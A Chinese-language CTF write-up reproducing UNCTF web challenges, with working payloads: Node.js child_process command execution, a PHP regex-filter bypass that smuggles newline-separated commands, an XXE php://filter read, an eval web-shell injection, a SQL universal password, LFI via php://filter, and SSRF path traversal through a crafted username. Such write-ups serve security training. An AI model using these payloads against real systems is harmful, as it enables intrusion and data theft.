学到了很多新的东西,学习学习
UNCTF安恒复现
checkin
新生赛很简单 直接/flag
真正的题目是nojs远程命令执行,参考:https://m.jb51.net/article/91411.htm
尝试
1 2 3 4 5 6 7 8
| /calc 1+1 2 可以计算,存在命令执行 /calc require('child_process').exec('cat+/flag') 返回[object Object] /calc require('child_process').exec('cat+/flag').toString() 同上 /calc require('child_process').execSync('cat+/flag').toString() undefined 可能是字符被拦截了 那就用$IFS替代 /calc require('child_process').execSync('cat$IFS/flag').toString() flag get
|
bypass
源码
php的正则有点小漏洞,两个斜杠丢进php只剩一个斜杠了,然后这个斜杠丢进正则就用来转义了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?php highlight_file(__FILE__); $a = $_GET['a']; $b = $_GET['b']; if (preg_match("/\'|\"|,|;|\\|\`|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $a)) $a = ""; $a ='"' . $a . '"'; if (preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $b)) $b = ""; $b = '"' . $b . '"'; $cmd = "file $a $b"; str_replace(" ","","$cmd"); system($cmd); ?>
|
由于这个小漏洞,a被过滤了|而不是,b被过滤了|\n,而不是被过滤了\n
Payload:a=\&b=%0aca\t%20/va?/???/htm?/.F1jh_/h3R3_1S_your_F1A9.txt%0a
flag 位置需要再寻找,但是到这一步问题已经不大
Do you like xml?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| xml 注入
POST /doLogin.php HTTP/1.1 Host: 112.74.37.15:8008 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 Accept: text/html,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 193 Content-Type: application/xml X-Requested-With: XMLHttpRequest X-Forwarded-For: 127.0.0.1
<?xml version ="1.0"?>
<!DOCTYPE a[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"> ]> <user><username>&xxe;</username><password>admin</password></user>
|
我也不知道为什么要xff
simple_web
根据提示后,考虑存在robots.txt文件
访问robots.txt出现一下内容
if (isset($_GET['reset'])) {
exec('/bin/rm -rf ' .$sandbox);
echo "your sandbox has been reset";
} else {
$sandbox = './sandbox/' . md5("chris" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
echo "your sandbox is ".$sandbox."/";
1 2 3 4 5 6 7 8 9 10 11 12 13
|
4. 继续访问getsandbox.php,得到一下内容.
```php <?php $str = addslashes($_GET['content']); $file = file_get_contents('content.php'); $file = preg_replace('|\$content=\'.*\';|', "\$content='$str';", $file); file_put_contents('content.php', $file); highlight_file(__FILE__); ?>
|
Payload:?content=aaa\';\@eval($_POST[x]);;//
,复现不成功,之后再测。
K&K战队的老家
万能密码登陆 '||1||'
伪协议读取http://183.129.189.60:10046/home.php?m=phP://filter/read=string.rot13/resource=home
解出源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| <?php error_reporting(0); include "./inc/config.php"; $mothed = $_GET["m"] ? $_GET["m"] : "index"; $cookie = $_COOKIE["identy"];
if($mothed == "login") { $username = $_POST["user"]; $userpass = $_POST["pw"]; if($username == "" || $userpass == "") { die('<script>alert("Account or password cannot be empty");window.location.href="./index.php";</script>'); } waf($username); waf($userpass); $db->user_check($username, $userpass, $session); } elseif($mothed == "index") { check($cookie, $db, $session); echo_index(); } elseif($mothed == "logout") { check($cookie, $db, $session); setcookie("identy",""); die('<script>alert("Goodbye");window.location.href="./index.php";</script>'); } else { mothed_waf($mothed); $page = $mothed . ".php"; include($page); check($cookie, $db, $session); $d = new debug($session, $d); $d->vt($session, $d); $d->debug($session); } ?>
|
simple_upload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66
| <?php highlight_file(__FILE__); @mkdir("./upload");
if (isset($_POST['submit'])) { $is_upload = false; $text = null; if(!empty($_FILES['upload_file'])){ $allow_type = array('image/jpeg','image/png','image/gif'); if(!in_array($_FILES['upload_file']['type'],$allow_type)){ $text = "type forbidden"; }else{ $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name']; $temp_name = $_FILES['upload_file']['tmp_name']; if (!is_array($file)) { $file = explode('.', strtolower($file)); }
$ext = end($file); $allow_suffix = array('jpg','png','gif'); if (!in_array($ext, $allow_suffix)) { $text = "ext forbidden"; }else{ $file_name = reset($file) . '.' . $file[count($file) - 1]; $img_path = "./upload" . '/' .$file_name; if (mb_strpos(file_get_contents($_FILES['upload_file']['tmp_name']), "<?") !== FALSE) { $text = "hacker"; }else{ if(file_exists($img_path)){ $text = "file exist already"; }else{ if (move_uploaded_file($temp_name, $img_path)) { $text = "upload succeed"; $is_upload = true; } else { $text = "upload failed"; } } } } } }else{ $text = "please upload your file"; }
} ?>
<form enctype="multipart/form-data" method="post"> <p>upload your img<p> <input class="input_file" type="file" name="upload_file"/> <p>the name you want to save:<p> <input class="input_text" type="text" name="save_name" value="myimg.jpg" /><br/> <input class="button" type="submit" name="submit" value="upload"/> </form>
<?php if($text != null){ echo $text; } ?> <?php if($is_upload){ echo "your file store in ".$img_path; } ?>
|
Arbi
->出题人笔记
注册登陆,发现派大星,查看图片是ssrf
但是如果更换src参数会提示,”Evil request!”
这个其实试一试就很容易猜到,这个路由的后端代码会匹配请求的url和用户名是否对应,在后面给的hint也可以得到这个结果
然后其实服务器的9000端口开了个SimpleHTTPServer,(题目描述)hint也讲的很清楚
如果直接访问/upload/evoA.jpg 也可以访问到图片,所以可以推断出,SimpleHTTPServer的根目录很可能在web根目录下,由于express的路由无法直接访问源代码文件,但是因为SimpleHTTPServer的原因,我们可以通过这个端口直接获取源码文件
这里就是第一个考点,虽然我们不知道node的入口文件是什么(大部分可能是app.js或者main.js,但此题不是)
node应用默认存在package.json,我们可以通过读取这个文件获取入口文件,由于上面说了ssrf接口会判断用户名是否匹配请求的url,所以我们可以注册一个恶意的用户名,”../package.json?”
这里?刚好把后面的.jpg给截断了,登录以后已经没有派大星了(图片内容是package.json的内容)
直接搞这个有源码../routers/index.js?